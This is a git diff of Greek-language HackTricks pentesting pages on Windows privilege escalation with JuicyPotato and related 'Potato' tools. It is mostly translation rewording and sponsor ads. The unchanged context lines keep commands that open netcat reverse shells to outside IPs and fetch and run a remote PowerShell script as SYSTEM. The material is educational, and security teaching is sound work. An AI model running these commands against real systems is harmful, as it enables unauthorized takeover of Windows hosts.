Από: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
|
||||
|
||||
|
@ -107,7 +107,7 @@ Optional args:
|
|||
|
||||
Σημείωση: Επισκεφθείτε [αυτήν τη σελίδα](https://ohpe.it/juicy-potato/CLSID/) για μια λίστα με CLSIDs προς δοκιμή.
|
||||
|
||||
### Λήψη αντίστροφου κέλυφους nc.exe
|
||||
### Λήψη αντίστροφου κελύφους nc.exe
|
||||
```
|
||||
c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *
|
||||
|
||||
|
@ -124,37 +124,37 @@ c:\Users\Public>
|
|||
```
|
||||
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
|
||||
```
|
||||
### Έναρξη νέου CMD (εάν έχετε πρόσβαση RDP)
|
||||
### Εκκίνηση νέου CMD (εάν έχετε πρόσβαση RDP)
|
||||
|
||||
![](<../../.gitbook/assets/image (297).png>)
|
||||
|
||||
## Προβλήματα CLSID
|
||||
|
||||
Συχνά, το προεπιλεγμένο CLSID που χρησιμοποιεί το JuicyPotato **δεν λειτουργεί** και η εκμετάλλευση αποτυγχάνει. Συνήθως, απαιτούνται πολλές προσπάθειες για να βρείτε ένα **λειτουργικό CLSID**. Για να λάβετε μια λίστα με τα CLSID που μπορείτε να δοκιμάσετε για ένα συγκεκριμένο λειτουργικό σύστημα, πρέπει να επισκεφθείτε αυτήν τη σελίδα:
|
||||
Συχνά, το προεπιλεγμένο CLSID που χρησιμοποιεί το JuicyPotato **δεν λειτουργεί** και η εκμετάλλευση αποτυγχάνει. Συνήθως, απαιτούνται πολλαπλές προσπάθειες για να βρείτε ένα **εργάσιμο CLSID**. Για να λάβετε μια λίστα με τα CLSID που πρέπει να δοκιμάσετε για ένα συγκεκριμένο λειτουργικό σύστημα, πρέπει να επισκεφθείτε αυτήν τη σελίδα:
|
||||
|
||||
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
|
||||
|
||||
### **Έλεγχος CLSID**
|
||||
### **Έλεγχος CLSIDs**
|
||||
|
||||
Αρχικά, θα χρειαστείτε μερικά εκτελέσιμα εκτός από το juicypotato.exe.
|
||||
|
||||
Κατεβάστε το [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) και φορτώστε το στη συνεδρία PS σας, κατεβάστε και εκτελέστε το [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Αυτό το σενάριο θα δημιουργήσει μια λίστα πιθανών CLSID για δοκιμή.
|
||||
Κατεβάστε το [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) και φορτώστε το στη συνεδρία PS σας, κατεβάστε και εκτελέστε το [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Αυτό το σενάριο θα δημιουργήσει μια λίστα πιθανών CLSIDs για δοκιμή.
|
||||
|
||||
Στη συνέχεια, κατεβάστε το [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(αλλάξτε τη διαδρομή προς τη λίστα CLSID και προς το εκτελέσιμο juicypotato) και εκτελέστε το. Θα αρχίσει να δοκιμάζει κάθε CLSID, και **όταν ο αριθμός θύρας αλλάξει, θα σημαίνει ότι το CLSID λειτούργησε**.
|
||||
|
||||
**Ελέγξτε** τα λειτουργικά CLSID **χρησιμοποιώντας την παράμετρο -c**
|
||||
**Ελέγξτε** τα εργάσιμα CLSIDs **χρησιμοποιώντας την παράμετρο -c**
|
||||
|
||||
## Αναφορές
|
||||
|
||||
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε εάν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -164,7 +164,7 @@ c:\Users\Public>
|
|||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Εργάζεστε σε μια εταιρεία **κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Εγγραφείτε στη** [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
|
|
@ -14,25 +14,25 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας κινητήρας αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον κινητήρα τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
{% hint style="warning" %}
|
||||
Το **JuicyPotato δεν λειτουργεί** στα Windows Server 2019 και στα Windows 10 έκδοση 1809 και μετά. Ωστόσο, τα [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) μπορούν να χρησιμοποιηθούν για να **εκμεταλλευτούν τα ίδια προνόμια και να κερδίσουν πρόσβαση σε επίπεδο `NT AUTHORITY\SYSTEM`**. Αυτή η [ανάρτηση στο blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) εξετάζει αναλυτικά το εργαλείο `PrintSpoofer`, το οποίο μπορεί να χρησιμοποιηθεί για την κατάχρηση των προνομίων υποκατάστασης σε υπολογιστές Windows 10 και Server 2019 όπου το JuicyPotato δεν λειτουργεί πλέον.
|
||||
**Το JuicyPotato δεν λειτουργεί** στα Windows Server 2019 και στα Windows 10 έκδοση 1809 και μετά. Ωστόσο, τα [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) μπορούν να χρησιμοποιηθούν για να **εκμεταλλευτούν τα ίδια προνόμια και να κερδίσουν πρόσβαση σε επίπεδο `NT AUTHORITY\SYSTEM`**. Αυτή η [ανάρτηση στο blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) εξετάζει λεπτομερώς το εργαλείο `PrintSpoofer`, το οποίο μπορεί να χρησιμοποιηθεί για την κατάχρηση των προνομίων υποκατάστασης σε υπολογιστές Windows 10 και Server 2019 όπου το JuicyPotato δεν λειτουργεί πλέον.
|
||||
{% endhint %}
|
||||
|
||||
## Γρήγορη Επίδειξη
|
||||
## Γρήγορη επίδειξη
|
||||
|
||||
### PrintSpoofer
|
||||
```bash
|
||||
|
@ -90,15 +90,15 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
|||
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
||||
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -108,10 +108,10 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
Loading…
Reference in a new issue